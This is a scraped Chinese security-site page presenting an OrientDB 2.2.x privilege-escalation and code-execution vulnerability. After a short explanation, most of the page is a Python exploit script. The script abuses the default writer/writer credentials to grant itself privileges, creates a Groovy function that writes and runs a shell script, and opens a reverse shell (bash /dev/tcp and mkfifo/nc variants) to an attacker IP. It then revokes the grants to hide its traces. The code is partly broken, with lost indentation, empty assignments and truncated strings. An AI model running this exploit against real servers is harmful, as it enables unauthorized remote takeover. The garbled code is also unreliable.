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                        <h1 class="article-title">
                            <a>OrientDB &lt;=2.22 代码执行</a>
                        <div class="article-meta">
                            <span class="item">2017-07-15</span>
                            <span class="item">分类:<a>Windows</a> /
                            <span class="item post-views">阅读(64516)</span>
                            <span class="item">评论(0)</span>
                    <article class="article-content">
                            <strong>Vulnerability Details</strong>
                            <br/>OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles
                            –<strong>admin</strong>, <strong>writer</strong> and <strong>reader</strong>. These have
                            their usernames same as the role. For each database created on the server, it assigns by
                            default these 3 users.
                        <p>The privileges of the users are:</p>
                            – access to all functions on the database without any limitation
                            – read-only user. The reader can query any records in the database, but can’t modify or
                            delete them. It has no access to internal information, such as the users and roles
                            – same as the "reader", but it can also create, update and delete records<br/>ORole​
                            structure handles users and their roles and is only accessible by the admin user. OrientDB
                            requires oRole read permissions to allow the user to display the permissions of users and
                            make other queries associated with oRole permissions.
                        <p>From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order
                            by statements​, this permission requirement is not required and information is returned to
                            unprivileged users.
                        <p>Since we enable the functions <code>where</code>, <code>fetchplan</code> and <code>order
                            by</code>, and OrientDB has a function where you could execute groovy functions and this <code>
                        </code> wrapper doesn’t have a sandbox and exposes system functionalities, we can run any
                            command we want.
                            <code class="lang-python">#! /usr/bin/env python
                                #-*- coding: utf-8 -*-
                                import sys
                                import requests
                                import json
                                import string
                                import random

                                target = sys.argv[1]

                                port = sys.argv[2] if sys.argv[2] else 2480
                                port = 2480

                                url =

                                def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
                                return ''.join(random.choice(chars) for _ in range(size))

                                def enum_databases(target,port="2480"):

                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:
                                #print "[+] Database Enumeration successful"
                                database = req.json()['databases']

                                return database

                                return False

                                def check_version(target,port="2480"):
                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:

                                headers = req.headers['server']
                                #print headers
                                if "2.2" in headers or "3." in headers:
                                return True

                                return False

                                def run_queries(permission,db,content=""):

                                databases = enum_databases(target)

                                url =

                                priv_enable = ["create","read","update","execute","delete"]
                                #query = "GRANT create ON database.class.ouser TO writer"

                                for priv in priv_enable:

                                if permission == "GRANT":
                                query = "GRANT %s ON %s TO writer"%(priv,db)
                                query = "REVOKE %s ON %s FROM writer"%(priv,db)
                                req = requests.post(url,data=query,auth=('writer','writer'))
                                if req.status_code == 200:
                                if priv == "execute":
                                return True
                                return False

                                print "[+] %s"%(content)
                                return True

                                def priv_escalation(target,port="2480"):

                                print "[+] Checking OrientDB Database version is greater than 2.2"

                                if check_version(target,port):

                                priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking
                                enabling operations on database.function")
                                priv2 = run_queries("GRANT","database.function","Enabled functional operations on
                                priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system

                                if priv1 and priv2 and priv3:
                                return True

                                return False

                                def exploit(target,port="2480"):

                                #query =
                                command = \'bash -i &gt;&amp; /dev/tcp/ 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'

                                #query =
                                command = 'whoami';File file = new File(\"hello.sh\");file.delete();file &lt;&lt;
                                (\"#!/bin/bash\\n\");file &lt;&lt; (command);def proc = \"bash hello.sh\".execute();

                                func_name = random_function_name()

                                print func_name

                                databases = enum_databases(target)

                                reverse_ip = raw_input('Enter the ip to connect back: ')

                                query =
                                command = \'bash -i &gt;&amp; /dev/tcp/'+reverse_ip+'/8081 0&gt;&amp;1\';File file = new
                                File(\\"hello.sh\\");file.delete();file &lt;&lt; (\\"#!/bin/bash\\\\n\\");file &lt;&lt;
                                (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
                                #query =
                                command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 8081
                                &gt;/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file
                                &lt;&lt; (\"#!/bin/bash\")\u000a file &lt;&lt; (command)\n def proc = \"bash
                                hello.sh\".execute() ","parameters":null}'
                                #query =
                                command = \'bash -i &gt;&amp; /dev/tcp/ 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute();","parameters":None}
                                req =

                                if req.status_code == 201:

                                #print req.status_code
                                #print req.json()

                                func_id = req.json()['@rid'].strip("#")
                                #print func_id

                                print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)

                                req =
                                #print req.status_code
                                #print req.text

                                if req.status_code == 200:
                                print "[+] Open netcat at port 8081.."
                                print "[+] Exploitation failed at last step, try running the script again."
                                print req.status_code
                                print req.text

                                #print "[+] Deleting traces.."

                                req =
                                priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
                                priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
                                priv3 = run_queries("REVOKE","database.systemclusters","Cleaning

                                #print req.status_code
                                #print req.text

                                def main():

                                target = sys.argv[1]
                                #port = sys.argv[1] if sys.argv[1] else 2480
                                port = sys.argv[2] if sys.argv[2] else 2480
                                #print port
                                port = 2480
                                if priv_escalation(target,port):
                                print "[+] Target not vulnerable"


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                        <a>OrientDB &lt;=2.22 代码执行</a>


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Vulnerability Details
OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles – admin, writer and reader. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.

The privileges of the users are:

admin – access to all functions on the database without any limitation
reader – read-only user. The reader can query any records in the database, but can’t modify or delete them. It has no access to internal information, such as the users and roles themselves
writer – same as the "reader", but it can also create, update and delete records
ORole​ structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.

From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements​, this permission requirement is not required and information is returned to unprivileged users.

Since we enable the functions where, fetchplan and order by, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesnt have a sandbox and exposes system functionalities, we can run any command we want.
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  • 快乐小土狗 2022-08-16 15:03





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